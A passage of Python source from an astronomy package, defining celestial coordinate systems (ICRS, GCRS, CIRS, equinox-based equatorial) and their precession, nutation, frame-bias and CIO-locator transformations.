dy = sqrt((laterr*sb*sl)**2+(longerr*cb*cl)**2)
dz = abs(laterr*cb)
dv = np.matrix((dx,dy,dz))
dxp,dyp,dzp = np.sqrt(np.power(m,2)*np.power(dv,2))
#intermediate variables for dlatp - each of the partial derivatives
chi = 1/(1+(zp/sp)**2)
#common factor chi not included below
dbdx = x*z*sp**-3
dbdy = y*z*sp**-3
dbdz = 1/sp
dlatp = chi*sqrt((dxp*dbdx)**2 + (dyp*dbdy)**2 + (dzp*dbdz)**2)
dlongp = sqrt((dxp*yp*xp**-2)**2 + (dyp/xp)**2)/(1 + (yp/xp)**2) #indep of z
else:
laterr = None
if fixrange:
ao = (latp+_pio2)/_twopi
latp = _twopi*abs((ao-np.floor(ao+0.5)))-_pio2
longp = longp % _twopi
if apply:
self.lat.radians = latp
self.long.radians = longp
if laterr is not None:
self.laterr.radians = dlatp
self.longerr.radians = dlongp
if laterr is None:
return latp,longp
else:
return latp,longp,dlatp,dlongp
def convert(self,tosys,optimize=_convertoptimizedefault):
"""
Converts the coordinate system from it's current system to a new
:class:`CoordinateSystem` object possibly with optimizations for
matrix-based transformation of :class:`LatLongCoordinates` objects.
.. warning::
The transformation optimizations used if `optimize` is True are only
correct if the conversion matricies are independent of the
coordinate values themselves (e.g. are linear and
epoch-independent). Examples that are good for optimization include
FK4->FK5->ICRS (all are epoch-independent).
In the future, this system will be smarter about
knowing when it is safe to optimize, but for now, only use it if
you're sure it will work correctly.
:param tosys:
The new coordinate system class. Should be a subclass of
:class:`CoordinateSystem` .
:param bool optimize:
If True, speed up the transformation by composing matricies where
possible. If False, the standard transformation is performed.
:returns: A new object of a class determined by `tosys`
:except: raises NotImplementedError if converters are not present
"""
if tosys is self.__class__:
return self
if optimize:
cache = CoordinateSystem._transformcache['smatrix']
#add this object to the cache if its missing
if self.__class__ not in cache:
cache[self.__class__] = {}
if tosys not in cache[self.__class__]:
convs = CoordinateSystem.getTransformPath(self.__class__,tosys)
if callable(convs): #direct transform
convs = [convs]
else:
convclasses = convs
convfuncs = [CoordinateSystem._converters[c1][c2] for c1,c2 in zip(convclasses[:-1],convclasses[1:])]
convs = []
#now we populate convs with converter functions that are
#either multplied-together matricies if they are smatrix
#converters or the actual converter function otherwise
combinedmatrix = None
lastcls = None
for cls,cfunc in zip(convclasses[:-1],convfuncs):
#note that cls here is the *previous* conversion's end
#class/current conversion's start class...
if cfunc.transtype=='smatrix':
mt = cfunc.basetrans(self)
if hasattr(mt,'nocache') and mt.nocache:
cache = None
if combinedmatrix is None:
combinedmatrix = mt
else:
combinedmatrix = mt * combinedmatrix
else:
if combinedmatrix is None:
convs.append(cfunc)
else:
convs.append(_OptimizerSmatrixer(combinedmatrix,cls))
convs.append(cfunc)
if combinedmatrix is not None:
convs.append(_OptimizerSmatrixer(combinedmatrix,convclasses[-1]))
#now cache this transform for future use unless it was banned above
if cache is not None:
cache[self.__class__][tosys] = convs
else:
convs = cache[self.__class__][tosys]
#now actually do the transforms
coord = self
for conv in convs:
coord = conv(coord)
return coord
else:
return CoordinateSystem.convert(self,tosys)
class _OptimizerSmatrixer(object):
"""
Used internally to do the optimization of :meth`LatLongCoordinates.convert`
"""
transtype = 'smatrix'
def __init__(self,combinedmatrix,tocls):
self.combinedmatrix = combinedmatrix
self.tocls = tocls
def __call__(self,coord):
return LatLongCoordinates._smatrix(self.combinedmatrix,coord,self.tocls)
def basetrans(self,coords):
return self.combinedmatrix
class EpochalLatLongCoordinates(LatLongCoordinates,EpochalCoordinates):
"""
A Coordinate system where the coordinates change as a function of time.
The origin and orientation of some coordinate systems are tied to the motion
of the Earth and Solar System and hence most be updated as time passes.
In general this only accounts for epoch-related changes in its own
coordinate system. If (for example) one has a :class:`ITRSCoordinates`
coordinate, changing the epoch only updates for polar motion. To properly
update all epoch-related such as precession/nutation and earth rotation, the
coordinate should be transformed to :class:`ICRSCoordinates` , update the
epoch, and transform back to :class:`TIRSCoordinates` .
"""
__slots__ = tuple()
julianepoch = True
def __init__(self,long=0,lat=0,longerr=None,laterr=None,epoch=None,distancepc=None):
"""
See the associated attribute docstrings for the meaning of the inputs.
"""
LatLongCoordinates.__init__(self,long,lat,longerr,laterr,distancepc)
self._epoch = epoch
def __getstate__(self):
d = LatLongCoordinates.__getstate__(self)
d.update(EpochalCoordinates.__getstate__(self))
return d
def __setstate__(self,d):
LatLongCoordinates.__setstate__(self,d)
EpochalCoordinates.__setstate__(self,d)
@add_docs(LatLongCoordinates.convert)
def convert(self,tosys,optimize=_convertoptimizedefault):
''
res = LatLongCoordinates.convert(self,tosys,optimize)
if issubclass(tosys,EpochalLatLongCoordinates):
res._epoch = self._epoch
return res
convert.__doc__ = LatLongCoordinates.convert.__doc__
class EquatorialCoordinatesBase(EpochalLatLongCoordinates):
"""
This object represents an angular location on the unit sphere, specified in
right ascension and declination. Some of the subclasses are not strictly
speaking equatorial, but they are close, or are tied to the equatorial
position of a particular epoch.
This is a superclass for all other Equatorial Coordinate systems -
particular reference systems implement the :meth:`transformToEpoch` method.
See the docstring for :class:`EpochalLatLongCoordinates` for subclassing
suggestions.
"""
__slots__ = tuple()
_longlatnames_ = ('ra','dec')
_longrange_ = (0,360)
def __str__(self):
rastr = self.ra.getHmsStr(canonical=True)
decstr = self.dec.getDmsStr(canonical=True)
#2.6 required for format
#return '{3}: {0} {1} ({2})'.format(rastr,decstr,self.epoch,self.__class__.__name__)
return '%s: %s %s %s'%(self.__class__.__name__,rastr,decstr,self.epochstr)
def __init__(self,*args,**kwargs):
"""
Input for equatorial coordinates. Can follow any of the following forms:
* EquatorialCoordinatesBase()
* EquatorialCoordinatesBase(:class:`EquatorialCoordinatesBase`)
* EquatorialCoordinatesBase('rastr decstr')
* EquatorialCoordinatesBase((ra,dec))
* EquatorialCoordinatesBase(ra,dec)
* EquatorialCoordinatesBase(ra,fdec,raerr,decerr)
* EquatorialCoordinatesBase(ra,dec,raerr,decerr,epoch)
* EquatorialCoordinatesBase(ra,dec,raerr,decerr,epoch,distancepc)
Note that the default epoch is 2000 if not otherwise specified. To
disable epoch tranformations, set the epoch to None. If scalar values
are provided, they are assummed to be degrees.
"""
posargs = {}
if len(args) == 0:
pass
if len(args) == 1:
if isinstance(args[0],EquatorialCoordinatesBase):
EpochalLatLongCoordinates.__init__(self, args[0].ra, args[0].dec,
args[0].raerr, args[0].decerr,
args[0].epoch, args[0].distancepc)
return
elif isinstance(args[0],basestring):
sargs = args[0].split()
posargs['ra'] = sargs[0]
posargs['dec'] = sargs[1]
else:
posargs['ra'],posargs['dec'] = args[0]
elif len(args) == 2:
posargs['ra'] = args[0]
posargs['dec'] = args[1]
elif len(args) == 4:
posargs['ra'] = args[0]
posargs['dec'] = args[1]
posargs['raerr'] = args[2]
posargs['decerr'] = args[3]
elif len(args) == 5:
posargs['ra'] = args[0]
posargs['dec'] = args[1]
posargs['raerr'] = args[2]
posargs['decerr'] = args[3]
posargs['epoch'] = args[4]
elif len(args) == 6:
posargs['ra'] = args[0]
posargs['dec'] = args[1]
posargs['raerr'] = args[2]
posargs['decerr'] = args[3]
posargs['epoch'] = args[4]
posargs['distancepc'] = args[5]
for k,v in posargs.iteritems():
if k in kwargs:
raise ValueError('got multiple values for argument '+k)
kwargs[k] = v
kwargs.setdefault('ra',0)
kwargs.setdefault('dec',0)
kwargs.setdefault('raerr',None)
kwargs.setdefault('decerr',None)
kwargs.setdefault('epoch',2000)
EpochalLatLongCoordinates.__init__(self,kwargs['ra'],kwargs['dec'],kwargs['raerr'],kwargs['decerr'])
if 'epoch' in kwargs:
self.epoch = kwargs['epoch']
if 'distancepc' in kwargs:
if 'distanceau' in kwargs:
raise TypeError("can't specify distance in both pc and au")
self.distancepc = kwargs['distancepc']
elif 'distanceau' in kwargs:
self.distanceau = kwargs['distanceau']
else:
self._dpc = None
@add_docs(EpochalLatLongCoordinates.convert)
def convert(self,tosys,optimize=_convertoptimizedefault):
''
res = EpochalLatLongCoordinates.convert(self,tosys,optimize)
if self._dpc is not None:
res._dpc = self._dpc
return res
convert.__doc__ = EpochalLatLongCoordinates.convert.__doc__
class ICRSCoordinates(EquatorialCoordinatesBase):
"""
Equatorial Coordinates tied to the International Celestial Reference System
(ICRS). Strictly speaking this is not an Equatorial system, as it is an
inertial frame that only aligns with Earth's equator at J2000, but it is
nearly an equatorial system at J2000.
.. note::
Technically, this is actually the Barycentric Celestial Referense System
(BCRS), distringuished from ICRS by having acounted for space motion. In
astropysics, instead, space motion is already accounted for by using
a :class:`astropysics.coords.ephems.EphemerisObject` object, which yields
coordinates (often :class:`ICRSCoordinates`) at the epoch of
observation.
.. warning::
Abberation of starlight is not yet implemented in transformations
to/from ICRS.
"""
__slots__ = tuple()
def transformToEpoch(self,newepoch):
"""
ICRS is an inertial frame, so no transformation is necessary
"""
EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
#Conversions to/from ICRS are in the other coordinate systems
def __makeFrameBias():
from ..utils import rotation_matrix
#sing USNO circular 179 for frame bias -- all in milliarcsec
da0 = -14.6
xi0 = -16.6170
eta0 = -6.8192
#mas->degrees
return rotation_matrix(-eta0/3600000,axis='x') *\
rotation_matrix(xi0/3600000,axis='y') *\
rotation_matrix(da0/3600000,axis='z')
frameBiasJ2000 = __makeFrameBias()
"""
Frame bias matrix such that vJ2000 = B*vICRS .
"""
#make it a static method just for clarity even though it isn't really visible
__makeFrameBias = staticmethod(__makeFrameBias)
class RectangularICRSCoordinates(RectangularCoordinates,EpochalCoordinates):
"""
Rectangular coordinates aligned to the ICRS with origin at the solar system
barycenter. The positive z-axis points to the north celestial pole and the
positive x-axis is along with the (0,0) point of the equatorial ICRS.
.. note::
Units for the coordinates are specified via the :attr:`unit` attribute.
When converting *from* :class:`ICRSCoordinates`, distances default to AU
if less than 1000 AU, otherwise, pc. If a distance is not present, the
default distance is 1 (unspecified unit).
"""
__slots__ = tuple()
julianepoch = True
def __init__(self,x,y,z,epoch=None,unit='pc'):
RectangularCoordinates.__init__(self,x,y,z)
self._epoch = epoch
self._unit = None
self.unit = unit
def __getstate__(self):
d = RectangularCoordinates.__getstate__(self)
d.update(EpochalCoordinates.__getstate__(self))
return d
def __setstate__(self,d):
RectangularCoordinates.__setstate__(self,d)
EpochalCoordinates.__setstate__(self,d)
def __str__(self):
if self.epoch is None:
epochstr = ''
else:
epochstr = ' ('+self.epochstr+')'
return RectangularCoordinates.__str__(self) + epochstr
def transformToEpoch(self,newepoch):
EpochalCoordinates.transformToEpoch(self,newepoch)
def _getUnit(self):
return self._unit
def _setUnit(self,val):
from ..constants import auperpc
if val is None:
self._unit = None
elif self._unit is None and (val in ('au','pc')):
self._unit = val
elif val=='au':
if self._unit == 'pc':
self.x *= auperpc
self.y *= auperpc
self.z *= auperpc
self._unit = val
elif val == 'pc':
if self._unit == 'au':
self.x /= auperpc
self.y /= auperpc
self.z /= auperpc
self._unit = val
else:
raise ValueError("unit must be 'au' or 'pc' - got %s"%val)
unit = property(_getUnit,_setUnit,doc="""The unit for these coordinates.
Must be 'au', 'pc', or None - setting to anything else will raise a
:exc:`ValueError`. If not None, setting to a new unit will convert the
values from AU to pc or vice versa.
""")
@CoordinateSystem.registerTransform('self',ICRSCoordinates)
def _toICRS(ric):
from math import asin,atan2,degrees
x,y,z = ric.x,ric.y,ric.z
r = (x*x+y*y+z*z)**0.5
dec = degrees(asin(z/r))
ra = degrees(atan2(y,x))
if ric.unit is None:
return ICRSCoordinates(ra,dec,epoch=ric.epoch)
elif ric.unit == 'pc':
return ICRSCoordinates(ra,dec,distancepc=r,epoch=ric.epoch)
elif ric.unit == 'au':
return ICRSCoordinates(ra,dec,distanceau=r,epoch=ric.epoch)
else:
raise NotImplementedError('Unrecognized unit %s in RectICRS->ICRS'%ric.unit)
@CoordinateSystem.registerTransform(ICRSCoordinates,'self')
def _fromICRS(ic):
from math import sin,cos
ra,dec = ic.ra.r,ic.dec.r
if ic.distanceau is None:
r = 1
unit = None
elif ic.distanceau>1000:
r = ic.distancepc[0]
unit = 'pc'
else:
r = ic.distanceau[0]
unit = 'au'
x = r*cos(ra)*cos(dec)
y = r*sin(ra)*cos(dec)
z = r*sin(dec)
return RectangularICRSCoordinates(x,y,z,ic.epoch,unit)
class GCRSCoordinates(EquatorialCoordinatesBase):
"""
Geocentric Celestial Reference System equatorial coordinates. The
orientation of this coordinates is fixed to the ICRS orientation, but with
origin at the earth geocenter.
.. warning::
Abberation of starlight not yet included in transforms.
"""
__slots__ = tuple()
def transformToEpoch(self,newepoch):
"""
Transforms from the current epoch to a new epoch by converting to ICRS
and back again in the new epoch.
"""
c1 = self.convert(ICRSCoordinates)
c1.epoch = newepoch
c2 = c1.convert(GCRSCoordinates)
self._lat = c2._lat
self._long = c2._long
self._laterr = c2._laterr
self._longerr = c2._longerr
self._dpc = c2._dpc
EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
#TODO:implement direct spherical transformations if needed/wanted for precision
# @CoordinateSystem.registerTransform('self',ICRSCoordinates,transtype='smatrix')
# def _toICRS(gc):
# return np.eye(3).view(np.matrix)
# @CoordinateSystem.registerTransform(ICRSCoordinates,'self',transtype='smatrix')
# def _fromICRS(ic):
# return np.eye(3).view(np.matrix)
class RectangularGCRSCoordinates(RectangularCoordinates,EpochalCoordinates):
"""
Rectangular coordinates aligned to the GCRS with origin at the Earth
geocenter. The positive z-axis points to the north celestial pole and the
positive x-axis points down the (0,0) point of the equatorial GCRS (and
thus, also ICRS).
The coordinates at this location are actually an "Astrometric place" - the
actual location relative to the geocenter. This is disctinct from
:class:`GCRSCoordinates` in that :class:`GCRSCoordinates` *includes*
aberration and light deflection, while :class:`RectangularGCRSCoordinates`
does not.
.. note::
Units for the coordinates are specified via the :attr:`unit` attribute.
When converting *from* :class:`GCRSCoordinates`, distances default to AU
if less than 1000 AU, otherwise, pc. If a distance is not present, the
default distance is 1 (unspecified unit).
"""
__slots__ = tuple()
julianepoch = True
def __init__(self,x,y,z,epoch=None,unit='pc'):
RectangularCoordinates.__init__(self,x,y,z)
self._epoch = epoch
self._unit = None
self.unit = unit
def __getstate__(self):
d = RectangularCoordinates.__getstate__(self)
d.update(EpochalCoordinates.__getstate__(self))
return d
def __setstate__(self,d):
RectangularCoordinates.__setstate__(self,d)
EpochalCoordinates.__setstate__(self,d)
def __str__(self):
if self.epoch is None:
epochstr = ''
else:
epochstr = ' ('+self.epochstr+')'
return RectangularCoordinates.__str__(self) + epochstr
def transformToEpoch(self,newepoch):
EpochalCoordinates.transformToEpoch(newepoch)
def _getUnit(self):
return self._unit
def _setUnit(self,val):
from ..constants import auperpc
if val is None:
self._unit = None
elif self._unit is None and (val in ('au','pc')):
self._unit = val
elif val=='au':
if self._unit == 'pc':
self.x *= auperpc
self.y *= auperpc
self.z *= auperpc
self._unit = val
elif val == 'pc':
if self._unit == 'au':
self.x /= auperpc
self.y /= auperpc
self.z /= auperpc
self._unit = val
else:
raise ValueError("unit must be 'au' or 'pc' - got %s"%val)
unit = property(_getUnit,_setUnit,doc="""The unit for these coordinates.
Must be 'au', 'pc', or None - setting to anything else will raise a
:exc:`ValueError`. If not None, setting to a new unit will convert the
values from AU to pc or vice versa.
""")
@CoordinateSystem.registerTransform('self',GCRSCoordinates)
def _toGCRS(rgc):
from math import asin,atan2,degrees
#TODO:implement aberration and light deflection
x,y,z = rgc.x,rgc.y,rgc.z
r = (x*x+y*y+z*z)**0.5
dec = degrees(asin(z/r))
ra = degrees(atan2(y,x))
if rgc.unit is None:
return GCRSCoordinates(ra,dec,epoch=rgc.epoch)
elif rgc.unit == 'pc':
return GCRSCoordinates(ra,dec,distancepc=r,epoch=rgc.epoch)
elif rgc.unit == 'au':
return GCRSCoordinates(ra,dec,distanceau=r,epoch=rgc.epoch)
else:
raise NotImplementedError('Unrecognized unit %s in RectGCRS->GCRS'%rgc.unit)
@CoordinateSystem.registerTransform(GCRSCoordinates,'self')
def _fromGCRS(gc):
from math import sin,cos
#TODO:implement aberration and light deflection
ra,dec = gc.ra.r,gc.dec.r
if gc.distanceau is None:
r = 1
unit = None
elif gc.distanceau>1000:
r = gc.distancepc[0]
unit = 'pc'
else:
r = gc.distanceau[0]
unit = 'au'
x = r*cos(ra)*cos(dec)
y = r*sin(ra)*cos(dec)
z = r*sin(dec)
return RectangularGCRSCoordinates(x,y,z,gc.epoch,unit)
@CoordinateSystem.registerTransform('self',RectangularICRSCoordinates)
def _toRectICRS(rgc):
from .ephems import earth_pos_vel
from ..obstools import epoch_to_jd
from ..constants import auperpc
x = rgc.x
y = rgc.y
z = rgc.z
unit = rgc.unit
epoch = rgc.epoch
if epoch is None:
raise ValueError('cannot transform GCRS to ICRS without an epoch')
if unit is None: #infitiely far, so no corrections
return RectangularICRSCoordinates(x,y,z,epoch,unit=None)
else: #do parallax correction
xe,ye,ze = earth_pos_vel(epoch_to_jd(epoch),True)[0]
if unit == 'au':
xp = x - xe
yp = y - ye
zp = z - ze
elif unit == 'pc':
xp = x - xe/auperpc
yp = y - ye/auperpc
zp = z - ze/auperpc
else:
raise NotImplementedError('Unit %s not supported by GCRS->ICRS'%unit)
return RectangularICRSCoordinates(xp,yp,zp,epoch,unit=unit)
@CoordinateSystem.registerTransform(RectangularICRSCoordinates,'self')
def _fromRectICRS(ric):
from .ephems import earth_pos_vel
from ..obstools import epoch_to_jd
from ..constants import auperpc
x = ric.x
y = ric.y
z = ric.z
unit = ric.unit
epoch = ric.epoch
if epoch is None:
raise ValueError('cannot transform ICRS to GCRS without an epoch')
if unit is None: #infitiely far, so no corrections
return RectangularGCRSCoordinates(x,y,z,epoch,unit=None)
else: #do parallax correction
xe,ye,ze = earth_pos_vel(epoch_to_jd(epoch),True)[0]
if unit == 'au':
xp = x - xe
yp = y - ye
zp = z - ze
elif unit == 'pc':
xp = x - xe/auperpc
yp = y - ye/auperpc
zp = z - ze/auperpc
else:
raise NotImplementedError('Unit %s not supported by ICRS->GCRS'%unit)
return RectangularGCRSCoordinates(xp,yp,zp,epoch,unit=unit)
def _precession_matrix_J2000_Capitaine(epoch):
"""
Computes the precession matrix from J2000 to the given Julian Epoch.
Expression from from Capitaine et al. 2003 as written in the USNO
Circular 179. This should match the IAU 2006 standard from SOFA
(although this has not yet been tested)
"""
from ..utils import rotation_matrix
T = (epoch-2000.0)/100.0
#from USNO circular
pzeta = (-0.0000003173,-0.000005971,0.01801828,0.2988499,2306.083227,2.650545)
pz = (-0.0000002904,-0.000028596,0.01826837,1.0927348,2306.077181,-2.650545)
ptheta = (-0.0000001274,-0.000007089,-0.04182264,-0.4294934,2004.191903,0)
zeta = np.polyval(pzeta,T)/3600.0
z = np.polyval(pz,T)/3600.0
theta = np.polyval(ptheta,T)/3600.0
return rotation_matrix(-z,'z') *\
rotation_matrix(theta,'y') *\
rotation_matrix(-zeta,'z')
def _load_nutation_data(datafn,seriestype):
"""
Loads nutation series from saved data files.
Seriestype can be 'lunisolar' or 'planetary'
"""
from ..utils.io import get_package_data
if seriestype == 'lunisolar':
dtypes = [('nl',int),
('nlp',int),
('nF',int),
('nD',int),
('nOm',int),
('ps',float),
('pst',float),
('pc',float),
('ec',float),
('ect',float),
('es',float)]
elif seriestype == 'planetary':
dtypes = [('nl',int),
('nF',int),
('nD',int),
('nOm',int),
('nme',int),
('nve',int),
('nea',int),
('nma',int),
('nju',int),
('nsa',int),
('nur',int),
('nne',int),
('npa',int),
('sp',int),
('cp',int),
('se',int),
('ce',int)]
else:
raise ValueError('requested invalid nutation series type')
lines = [l for l in get_package_data(datafn).split('\n') if not l.startswith('#') if not l.strip()=='']
lists = [[] for n in dtypes]
for l in lines:
for i,e in enumerate(l.split(' ')):
lists[i].append(dtypes[i][1](e))
return np.rec.fromarrays(lists,names=[e[0] for e in dtypes])
_nut_data_00a_ls = _load_nutation_data('iau00a_nutation_ls.tab','lunisolar')
_nut_data_00a_pl = _load_nutation_data('iau00a_nutation_pl.tab','planetary')
def _nutation_components20062000A(epoch):
"""
:returns: eps,dpsi,deps in radians
"""
from ..obstools import epoch_to_jd
from .funcs import obliquity
epsa = obliquity(epoch_to_jd(epoch),2006)
raise NotImplementedError('2006/2000A nutation model not implemented')
return epsa,dpsi,deps
_nut_data_00b = _load_nutation_data('iau00b_nutation.tab','lunisolar')
def _nutation_components2000B(intime,asepoch=True):
"""
:param intime: time to compute the nutation components as a JD or epoch
:type intime: scalar
:param asepoch: if True, `intime` is interpreted as an epoch, otherwise JD
:type asepoch: bool
:returns: eps,dpsi,deps in radians
"""
from ..constants import asecperrad
from ..obstools import epoch_to_jd,jd2000
from .funcs import obliquity
if asepoch:
jd = epoch_to_jd(intime)
else:
jd = intime
epsa = np.radians(obliquity(jd,2000))
t = (jd-jd2000)/36525
#Fundamental (Delaunay) arguments from Simon et al. (1994) via SOFA
#Mean anomaly of moon
el = ((485868.249036 + 1717915923.2178*t)%1296000)/asecperrad
#Mean anomaly of sun
elp = ((1287104.79305 + 129596581.0481*t)%1296000)/asecperrad
#Mean argument of the latitude of Moon
F = ((335779.526232 + 1739527262.8478*t)%1296000)/asecperrad
#Mean elongation of the Moon from Sun
D = ((1072260.70369 + 1602961601.2090*t)%1296000)/asecperrad
#Mean longitude of the ascending node of Moon
Om = ((450160.398036 + -6962890.5431*t)%1296000)/asecperrad
#compute nutation series using array loaded from data directory
dat = _nut_data_00b
arg = dat.nl*el + dat.nlp*elp + dat.nF*F + dat.nD*D + dat.nOm*Om
sarg = np.sin(arg)
carg = np.cos(arg)
p1uasecperrad = asecperrad*1e7 #0.1 microasrcsecperrad
dpsils = np.sum((dat.ps + dat.pst*t)*sarg + dat.pc*carg)/p1uasecperrad
depsls = np.sum((dat.ec + dat.ect*t)*carg + dat.es*sarg)/p1uasecperrad
#fixed offset in place of planetary tersm
masecperrad = asecperrad*1e3 #milliarcsec per rad
dpsipl = -0.135/masecperrad
depspl = 0.388/masecperrad
return epsa,dpsils+dpsipl,depsls+depspl #all in radians
def _nutation_matrix(epoch):
"""
Nutation matrix generated from nutation components.
Matrix converts from mean coordinate to true coordinate as
r_true = M * r_mean
"""
from ..utils import rotation_matrix
#TODO: implement higher precision 2006/2000A model if requested/needed
epsa,dpsi,deps = _nutation_components2000B(epoch) #all in radians
return rotation_matrix(-(epsa + deps),'x',False) *\
rotation_matrix(-dpsi,'z',False) *\
rotation_matrix(epsa,'x',False)
def _load_CIO_locator_data(datafn):
"""
Loads CIO locator series terms from saved data files.
returns polycoeffs,termsarr (starting with 0th)
"""
from ..utils.io import get_package_data
lines = [l for l in get_package_data(datafn).split('\n') if not l.startswith('#') if not l.strip()=='']
coeffs = []
sincs = []
coscs = []
orders = []
inorder = False
for l in lines:
if 'Polynomial coefficients:' in l:
polys = l.replace('Polynomial coefficients:','').split(',')
polys = np.array(polys,dtype=float)
elif 'order' in l:
if inorder:
orders.append((np.array(coeffs,dtype=int),
np.array(sincs,dtype=float),
np.array(coscs,dtype=float)))
coeffs = []
sincs = []
coscs = []
inorder = True
elif inorder:
ls = l.split()
coeffs.append(ls[:8])
sincs.append(ls[8])
coscs.append(ls[9])
if inorder:
orders.append((np.array(coeffs,dtype=int),
np.array(sincs,dtype=float),
np.array(coscs,dtype=float)))
return polys,orders
_CIO_locator_data = _load_CIO_locator_data('iau00_cio_locator.tab')
class CIRSCoordinates(EquatorialCoordinatesBase):
"""
Represents an object as equatorial coordinates in the Celestial Intermediate
Reference System. This is the post-2000 IAU system for equatorial
coordinates that seperates the coordinate system from the dynamically
complicated and somewhat imprecisely-defined ideas of the equinox and
ecliptic. This system's fundamental plane is the equator of the Celestial
Intermediate Pole (CIP) and the origin of RA is at the Celestial
Intermediate Origin (CIO).
Changes to the :attr:`epoch` will result in the coordinates being updated
for precession nutation. Nutation currently uses the IAU 2000B model that
should be good to ~1 mas. If aberration or annual parallax corrections are
necessary, convert to :class:`ICRSCoordinates`, change the epoch, and then
convert back to :class:`CIRSCoordinates`.
To convert from these coordinates to :class:`HorizontalCoordinates`
appropriate for observed coordinates, site information is necessary. Hence,
the transformations from equatorial to horizontal coordinates are performed
by the :class:`~astropysics.obstools.Site` class in the
:mod:`~astropysics.obstools` module, and attempting to directly convert will
raise an :exc:`TypeError`.
"""
def transformToEpoch(self,newepoch):
"""
Transforms these :class:`EquatorialCoordinates` to a new epoch using the
IAU 2000 precessions from Capitaine, N. et al. 2003 as written in the
USNO Circular 179.
"""
if self.epoch is not None and newepoch is not None:
M = self._CMatrix(self.epoch).T
Mn = self._CMatrix(newepoch)
self.matrixRotate(Mn*M)
#this sets the epoch
EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
@staticmethod
def _CMatrix(epoch):
"""
The GCRS->CIRS transformation matrix
"""
B = ICRSCoordinates.frameBiasJ2000
if epoch is None:
return B
else:
from math import sin,cos,atan,atan2,sqrt
from ..utils import rotation_matrix
P = _precession_matrix_J2000_Capitaine(epoch)
N = _nutation_matrix(epoch)
x,y,z = (N*P*B).A[2]
xsq,ysq = x**2,y**2
bz = 1/(1+z)
s = CIRSCoordinates._CIOLocator(epoch)
#matrix components - see Circular 179 or IERS Conventions 2003
a,b,c = 1-bz*xsq , -bz*x*y , -x
d,e,f = -bz*x*y , 1 - bz*ysq , -y
g,h,i = x , y , 1 - bz*(xsq+ysq)
#return rotation_matrix(-s,'z',defrees=False)*np.mat([[a,b,c],
# [d,e,f],
# [g,h,i]])
si = sin(s)
co = cos(s)
M = [[a*co - d*si,b*co - e*si,c*co - f*si],
[a*si + d*co,b*si + e*co,c*si + f*co],
[ g, h, i ]]
return np.mat(M)
# #SOFA implementation using spherical angles - numerically identical
# r2 = x*x + y*y
# e = atan2(y,x) if r2 != 0 else 0
# d = atan(sqrt(r2/(1-r2)))
# return rotation_matrix(-(e+s),'z',False) *\
# rotation_matrix(d,'y',False) *\
# rotation_matrix(e,'z',False)
@staticmethod
def _CIOLocator(epoch):
"""
Returns the CIO locator s for the provided epoch. s is the difference in
RA between the GCRS and CIP points for the ascending node of the CIP
equator.
"""
#from ..obstools import jd2000,epoch_to_jd
from ..constants import asecperrad
from .ephems import _mean_anomaly_of_moon,_mean_anomaly_of_sun,\
_mean_long_of_moon_minus_ascnode,_long_earth,\
_mean_elongation_of_moon_from_sun,_long_venus,\
_mean_long_asc_node_moon,_long_prec
#first need to find x and y for the CIP, as s+XY/2 is needed
B = ICRSCoordinates.frameBiasJ2000
P = _precession_matrix_J2000_Capitaine(epoch)
N = _nutation_matrix(epoch)
#N*P*B takes GCRS to true, so CIP is bottom row
x,y,z = (N*P*B).A[2]
#T = (epoch_to_jd(epoch) - jd2000)/36525
T = (epoch-2000)/100
fundargs = [] #fundamental arguments
fundargs.append(_mean_anomaly_of_moon(T))
fundargs.append(_mean_anomaly_of_sun(T))
fundargs.append(_mean_long_of_moon_minus_ascnode(T))
fundargs.append(_mean_elongation_of_moon_from_sun(T))
fundargs.append(_mean_long_asc_node_moon(T))
fundargs.append(_long_venus(T))
fundargs.append(_long_earth(T))
fundargs.append(_long_prec(T))
fundargs = np.array(fundargs)
polys,orders = _CIO_locator_data
newpolys = polys.copy() #copy 0-values to add to
for i,o in enumerate(orders):
ns,sco,cco = o
a = np.dot(ns,fundargs)
newpolys[i] += np.sum(sco*np.sin(a) + cco*np.cos(a))
return np.polyval(newpolys[::-1],T)/asecperrad - x*y/2.0
@CoordinateSystem.registerTransform(GCRSCoordinates,'self',transtype='smatrix')
def _fromGCRS(gcrsc):
return CIRSCoordinates._CMatrix(gcrsc.epoch)
@CoordinateSystem.registerTransform('self',GCRSCoordinates,transtype='smatrix')
def _toGCRS(cirssys):
return CIRSCoordinates._CMatrix(cirssys.epoch).T
class EquatorialCoordinatesEquinox(EquatorialCoordinatesBase):
"""
Represents an object in *mean* geocentric apparent equatorial coordinates,
using the pre-IAU2000 systems where the plane of the ecliptic is the
fundamental plane and the origin is at the equinox of date (as set by
:attr:`epoch`).
Changes to the :attr:`epoch` will result in the coordinates being updated
for precession, but not nutation, nor annual abberation. Neither are
planned by the primary author of this package, as IAU 2000 recommends using
only CIO-based systems, but if someone actually wants equinox-based
nutation, feel free to implement it and pass it along.
To convert from these coordinates to :class:`HorizontalCoordinates`
appropriate for observed coordinates, site information is necessary. Hence,
the transformations from equatorial to horizontal coordinates are performed
by the :class:`~astropysics.obstools.Site` class in the
:mod:`astropysics.obstools` module, and attempting to directly convert will
raise a :exc:`TypeError`.
"""
transweight = 1.1 #Equinox-based transforms are to be avoided in favor of CIRS
__slots__ = tuple()
def transformToEpoch(self,newepoch):
"""
Transforms these :class:`EquatorialCoordinates` to a new epoch using the
IAU 2000 precessions from Capitaine, N. et al. 2003 as written in the
USNO Circular 179.
"""
if self.epoch is not None and newepoch is not None:
#convert from current to J2000
B = _nutation_matrix(self.epoch) *\
_precession_matrix_J2000_Capitaine(self.epoch).T
#transpose==inv; matrix is real unitary
#convert to new epoch
A = _nutation_matrix(newepoch) *\
_precession_matrix_J2000_Capitaine(newepoch)
self.matrixRotate(A*B)
EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
@CoordinateSystem.registerTransform(GCRSCoordinates,'self',transtype='smatrix')
def _fromGCRS(gcrsc):
B = ICRSCoordinates.frameBiasJ2000
if gcrsc.epoch is None:
return B
else:
P = _precession_matrix_J2000_Capitaine(gcrsc.epoch)
N = _nutation_matrix(gcrsc.epoch)
return N*P*B
@CoordinateSystem.registerTransform('self',GCRSCoordinates,transtype='smatrix')
def _toGCRS(eqsys):
return EquatorialCoordinatesEquinox._fromGCRS(eqsys).T
@CoordinateSystem.registerTransform('self',CIRSCoordinates,transtype='smatrix')
def _toCIRS(eqsys):
if eqsys.epoch is None:
return np.eye(3).view(np.matrix)
else:
from ..obstools import epoch_to_jd
from .funcs import equation_of_the_origins
